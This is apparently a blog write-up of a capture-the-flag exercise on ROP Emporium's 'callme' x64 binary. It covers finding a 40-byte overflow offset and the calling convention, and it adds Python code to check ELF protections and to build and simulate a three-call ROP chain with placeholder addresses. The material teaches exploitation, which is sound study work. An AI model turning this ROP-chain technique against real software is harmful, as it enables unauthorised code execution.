Tuesday, January 23, 2024

"callme" x64 exploitation - ROP EMPORIUM [PWNED!!]


In this write-up, I'll show how I managed to exploit ROP Emporium's 'callme' x64 binary. The challenge requires calling functions present within the binary with specific parameters, using a ROP chain, in order to read the flag. If you don't know what ROP chains are and how they can be used to bypass certain mitigations, I suggest you look here. That resource also covers a lot of other exploitation techniques you can explore for your own curiosity. Let's start with the challenge.

We start off by having a look at the 'callme' file protections and file type to see what we're dealing with.

The challenge has only NX enabled, which means the stack is non-executable; this stops us from injecting shellcode onto the stack and jumping to it. The challenge is also dynamically linked, which tells us the standard C functions it uses (printf and the rest) live in libc, and it is not stripped, which makes reversing easier.
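To make the checksec output less magical, here is an added example (not part of the original write-up, and not ROP Emporium code) of what those two checks actually read from the ELF: the flags of the PT_GNU_STACK program header decide NX, and the presence of a PT_INTERP header marks a dynamically linked binary. The ELF image it parses is constructed inline from a header and two program headers so it runs offline; point `elf_protections()` at the bytes of a real file to use it on the challenge binary.

```python
import struct

# Program header types and flag bits from the ELF specification.
PT_INTERP = 3
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def build_elf64(stack_flags: int, with_interp: bool = True) -> bytes:
    """Construct a minimal ELF64 image: a 64-byte header followed by program
    headers only. It is not loadable; it exists so elf_protections() has
    realistic bytes to parse without a binary on disk (constructed sample)."""
    phdrs = []
    if with_interp:
        # (p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align)
        phdrs.append((PT_INTERP, PF_R, 0, 0, 0, 0, 0, 1))
    phdrs.append((PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16))

    # e_ident: magic, EI_CLASS=2 (64-bit), EI_DATA=1 (little endian),
    # EI_VERSION=1, EI_OSABI=0, then ABI version and padding.
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    header = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        3,            # e_type: ET_DYN (irrelevant to this check)
        0x3E,         # e_machine: x86-64
        1,            # e_version
        0,            # e_entry
        64,           # e_phoff: program headers start right after the header
        0,            # e_shoff: no section headers in this sample
        0,            # e_flags
        64,           # e_ehsize
        56,           # e_phentsize: size of one ELF64 program header
        len(phdrs),   # e_phnum
        0, 0, 0,      # e_shentsize, e_shnum, e_shstrndx
    )
    return header + b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs)


def elf_protections(blob: bytes) -> dict:
    """Report the two properties read off checksec in the write-up:
    'nx'      - PT_GNU_STACK exists and lacks the PF_X bit
    'dynamic' - a PT_INTERP header names a dynamic loader"""
    if blob[:4] != b"\x7fELF" or blob[4] != 2:
        raise ValueError("not an ELF64 image")
    e_phoff = struct.unpack_from("<Q", blob, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", blob, 54)

    nx = False        # no PT_GNU_STACK at all is reported as NX off, like checksec
    dynamic = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", blob, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_INTERP:
            dynamic = True
    return {"nx": nx, "dynamic": dynamic}


if __name__ == "__main__":
    print(elf_protections(build_elf64(PF_R | PF_W)))           # NX on, dynamic
    print(elf_protections(build_elf64(PF_R | PF_W | PF_X, False)))  # NX off, static
```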


We already know there's a buffer overflow vulnerability in the binary. Generating a cyclic pattern of 100 bytes and feeding these junk bytes into the program triggers a segmentation fault, indicating we've written over other parts of memory. Now that a segfault has been triggered, the next step is to establish how many bytes it takes from where our input starts to where RIP, the instruction pointer, gets overwritten. We do that with the cyclic -l command in pwndbg.

40 bytes. Cool. Now we know the distance from our input to RIP. Now comes the juicy part. According to the description, we need to call callme_one(), callme_two() and callme_three(), in that order, each with 0xdeadbeefdeadbeef, 0xcafebabecafebabe and 0xd00df00dd00df00d as function parameters. To achieve this, we rely on the x64 (System V) calling convention, which dictates that function parameters are passed in the rdi, rsi and rdx registers (then rcx, r8 and r9) respectively.

Let's analyze the binary quickly to see if there are any interesting functions.


Interesting. Notice that there's a usefulGadgets function in the binary. If you know anything about ROP chains, you'll know that a ROP chain is essentially a sequence of gadgets, each ending with a RET instruction, that can be used to bypass NX protection and achieve code execution. Looking at the function in pwndbg, it has exactly the gadgets we need! It's looking good so far. Now all we need to do is create an exploit script to exploit the vulnerability and leak the flag.

Final exploit script.


I'm using pwntools for the script. It's a useful Python-based exploit development and reversing library with quite a few handy tools. It's a short exploit script: the first half just defines the path to the challenge binary and hard-codes the function parameters we need.

The second half defines a function that sets up the arguments on the stack, along with the return address overwrite that sends RIP into the gadget, and a for loop that repeats this until all three functions have been called with the correct parameters.
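Since the script itself is only shown as a screenshot, here is an added example (my own code, not the write-up's pwntools script) of the two pieces that matter for understanding the chain: a builder that lays out the payload exactly as described (40 bytes of padding, then for each function a gadget address, the three arguments, and the function address), and a small simulator that walks the payload the way the CPU would after the overflowed return, so you can check the chain before touching the binary. The gadget is assumed to be `pop rdi; pop rsi; pop rdx; ret`, and every address below is a constructed placeholder; the real ones come from the disassembly (or pwntools' ELF symbol lookup) when you run this against the challenge.

```python
import struct

# Constructed placeholder addresses; the write-up does not list the real ones.
POP3_RET = 0x40093C            # assumed usefulGadgets: pop rdi; pop rsi; pop rdx; ret
FUNCS = {                      # assumed PLT/function addresses
    "callme_one": 0x400720,
    "callme_two": 0x400740,
    "callme_three": 0x4006F0,
}
ARGS = (0xDEADBEEFDEADBEEF, 0xCAFEBABECAFEBABE, 0xD00DF00DD00DF00D)
OFFSET = 40                    # bytes from the start of input to the saved return address
ORDER = ("callme_one", "callme_two", "callme_three")


def p64(value: int) -> bytes:
    """Pack a little-endian 64-bit value (same as pwntools' p64)."""
    return struct.pack("<Q", value)


def u64(data: bytes) -> int:
    return struct.unpack("<Q", data)[0]


def build_chain(offset, gadget, funcs, args, order=ORDER) -> bytes:
    """Padding up to the saved return address, then one block per function:
    [gadget][arg1][arg2][arg3][function]. The gadget's pops consume the three
    arguments into rdi, rsi, rdx and its ret lands in the function; the
    function's own ret then picks up the next block's gadget."""
    payload = b"A" * offset
    for name in order:
        payload += p64(gadget) + b"".join(p64(a) for a in args) + p64(funcs[name])
    return payload


def simulate(payload, offset, gadget, funcs):
    """Replay the chain: treat payload[offset:] as the stack at the moment the
    overflowed function executes ret, and record every (function, rdi, rsi, rdx)
    the chain would call. Raises if control would land on an unknown address."""
    names = {addr: name for name, addr in funcs.items()}
    rsp = offset
    regs = (None, None, None)      # rdi, rsi, rdx before the first gadget runs
    calls = []

    def pop():
        nonlocal rsp
        if rsp + 8 > len(payload):
            raise ValueError("chain ran off the end of the payload")
        value = u64(payload[rsp:rsp + 8])
        rsp += 8
        return value

    rip = pop()                    # the overwritten saved return address
    while True:
        if rip == gadget:
            regs = (pop(), pop(), pop())   # pop rdi; pop rsi; pop rdx
            rip = pop()                    # ret
        elif rip in names:
            calls.append((names[rip],) + regs)
            if rsp >= len(payload):        # last block: nothing left to return into
                return calls
            rip = pop()                    # the callee's ret consumes the next slot
        else:
            raise ValueError(f"chain jumps to unknown address {rip:#x}")


if __name__ == "__main__":
    chain = build_chain(OFFSET, POP3_RET, FUNCS, ARGS)
    for call in simulate(chain, OFFSET, POP3_RET, FUNCS):
        print(call[0], *(hex(a) for a in call[1:]))
```

In the real script the payload is simply sent to the process on stdin; the simulator stays useful as a unit test of the layout, since a chain that is off by one slot (a missing argument, or a gadget address in the wrong place) shows up as an "unknown address" error here instead of a silent crash in the debugger.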

Now we run the script.

The exploit script worked. Flag leaked!